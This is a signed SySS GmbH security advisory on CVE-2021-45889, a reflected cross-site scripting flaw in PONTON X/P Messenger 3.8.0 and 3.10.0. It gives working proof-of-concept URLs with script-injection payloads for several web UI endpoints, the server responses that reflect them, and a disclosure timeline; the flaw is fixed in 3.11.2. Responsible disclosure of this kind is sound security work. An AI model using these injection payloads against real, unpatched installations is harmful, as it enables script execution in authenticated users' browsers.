-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2021-078
Product:                   PONTON X/P Messenger
Manufacturer:              PONTON GmbH
Affected Version(s):       3.8.0 (Build 201909201204), 3.10.0 (Build 202009171429)
Tested Version(s):         3.8.0 (Build 201909201204), 3.10.0 (Build 202009171429)
Vulnerability Type:        Reflected Cross-Site Scripting (CWE-79)
Risk Level:                Medium
Solution Status:           Fixed in release of version 3.11.2
Manufacturer Notification: 2022-01-25
Solution Date:             2022-02-07
Public Disclosure:         2022-03-11
CVE Reference:             CVE-2021-45889
Author of Advisory:        Stefan Walter, Thibaud Kehler, Tarek Awadallah (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The manufacturer describes the product as follows (see [1]):

> The PONTON X/P Messenger (or PONTON X/P for short) is PONTON’s
> high-quality B2B integration solution with a proven track-record in
> several industries since 2001. PONTON X/P is a highly configurable
> ebXML, AS/1, AS/2, AS/3 and AS/4 compliant messaging software. It
> provides additional features to deal with typical B2B integration
> issues (such as a listener component for the DMZ, certificate
> management and non-repudiation of messages). PONTON X/P is typically
> used as communication layer in a business consortium or as an (OEM)
> communication extension of an existing software application.

The tested version was not the most recent one. The current versions 4.X were
not affected. The vulnerability can only be exploited by authorisation with a
user of the Ponton X/P web UI which is normally only accessible on the internal
network. The vulnerability is fixed with Ponton X/P Version 3.11.2. Please
upgrade to the Version 3.11.2.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Several functions are vulnerable to reflected cross-site scripting.

For testing purposes, a local installation was set up using the
application binaries provided at [2] and the instructions at [3]:

    $ wget 'https://www.ponton.de/downloads/xp/3.10/PontonXP-Messenger-3.10.0-Linux.zip'
    $ unzip PontonXP-Messenger-3.10.0-Linux.zip -d PontonXP-Messenger-3.10.0-Linux
    $ cd PontonXP-Messenger-3.10.0-Linux
    $ ./pontonxp start

Afterwards, the web application is reachable at https://localhost:8443.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

SySS GmbH identified three different categories of reflected cross-site scripting:


The first category can be triggered by visiting, for example,
https://localhost:8443/pontonxp/private/index.jsp?partners/ShowNonLocalPartners.do?localID=%27-prompt(%22SySS%20RXSS%20PoC%22)//.
As can be seen in the following excerpt of the server response, the
payload is injected directly into a JavaScript context:

    <script type="text/javascript">
        partnerLocalID=''-prompt("SySS RXSS PoC")//';
    </script>


The second category can be triggered by visiting
https://localhost:8443/pontonxp/private/index.jsp?javascript:alert(%27SySS_RXSS_PoC%27).
As can be seen in the following excerpt of the server response, the
payload is injected into the iframe src and then executed:

  <frameset cols="210,*" frameborder="no" border="0" framespacing="0">
     <frame src="Tree.do" name="lhs" scrolling="auto" noresize="">

     <frame src="javascript:alert(%27SySS_RXSS_PoC%27)" name="rhs">
  </frameset>


The third category can be triggered by visiting either one of the following
URLs (the list is non-exhaustive):

  * https://localhost:8443/pontonxp/private/index.jsp?database/databaseTab.jsp?syss%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E

  * https://localhost:8443/pontonxp/private/index.jsp?activation/activationMainTab.jsp?syss%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E

  * https://localhost:8443/pontonxp/private/index.jsp?communication/serverTab.jsp?syss%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E

  * https://localhost:8443/pontonxp/private/index.jsp?emailNotification/notificationTab.jsp?ucbgm%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E

As can be seen in the following excerpt of the server response for the
first request in the list, the payload is used to break out of the
iframe src and to execute code by inserting a new script tag:

    <tr>
        <td width="100%" valign="top" height="100%">
            <iframe src="ShowDBConnectionSettings.do?syss"></iframe><script>alert("SySS RXSS PoC");</script>
        </td>
    </tr>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vulnerability has been fixed with Ponton X/P version 3.11.2.

More information:
https://www.ponton.de/downloads/xp/3.11/documents/ReleaseNotes3112.pdf

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-12-06: Vulnerability discovered
2022-01-25: Vulnerability reported to manufacturer
2022-02-07: Fixed version 3.11.2 released by manufacturer
2022-03-11: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for PONTON X/P MESSENGER
    https://www.ponton.de/products/xpmessenger/
[2] PONTON X/P MESSENGER 3.10.0 download
    https://ponton.de/downloads/xp/3.10/PontonXP-Messenger-3.10.0-Linux.zip
[3] PONTON X/P MESSENGER 3.10.0 documentation
    https://ponton.de/downloads/xp/3.10/documents/MessengerDocumentation310.pdf
[4] SySS Security Advisory SYSS-2021-078
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-078.txt
[5] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Stefan Walter, Thibaud Kehler,
and Tarek Awadallah of SySS GmbH.

E-Mail: stefan.walter@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Stefan_Walter.asc
Key Fingerprint: 74DD 77CD 0317 2777 470D 38BE BE0B B311 DA3F 3E16

E-Mail: thibaud.kehler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud_Kehler.asc
Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A

E-Mail: tarek.awadallah@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Tarek_Awadallah.asc
Key Fingerprint: 2F33 D0ED F453 D931 177B  847B 4F87 A6B9 28A6 61F0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEdN13zQMXJ3dHDTi+vguzEdo/PhYFAmIogvoACgkQvguzEdo/
PhYsmg//WqCyEN2Y5YrAoKLoZ0rW7Be08rcuLTNvnTFXqkerjgO6xxlLyfa5cPBT
gFBnv3cXic00K+1NgvKSPrLDhHMHxS6xV+jsSQ2y8OVsn8BjPuoEOLnWqnP9SI3o
eB0WfY4OtaipZ+EMXqTm3A7P2i3hNSiv1wXK8lUVw4a48wzicQrYoyb9n0ONdlRz
bFB4X8eHBKrhlyGaN60OpOfu9frL6qiqXSzoEYvFI//38uHmMGu0113icBt2ELqQ
1dusLfSaOn9yLP+H+7tB2QLrzQkK0LYEBT2o8zmZ7l3ORRTe/EnhYG1yEpM8ZQ4p
/PR0+WoC7lPtQYjfQlmphkHhd4RPge38DTCDs7i5u2mpjIieCaN93vsvtSeXdKEF
nEZGCYSFUXHrSW6orP5kyKQ0F7FlXHvwjST5d+QxvSr3fEq2N2ePXzg5q/XJfBcc
UxuLDfoGSosMka+rJe5tm9ZAg+SGzEEWHdQwkq+ckou3WbY6QlAV4HF+6NFBN8t8
kaT6gz5luk5X3O7u9o7nlv9cgUJ2e36HJ1FinUH0REQqRS15ZvMCkWIhIL3+cI2J
11nWk0/OvlB8AbD4YJuI2ItU9qOBOWf/6v6wRraQjbMCvSOyz4t3cb7xGW4mBYuy
0QRFbX4ZvKPEqGatKp4UwocbFO5DIBIMdMo3bFcemIJQvs6xBow=
=NHRK
-----END PGP SIGNATURE-----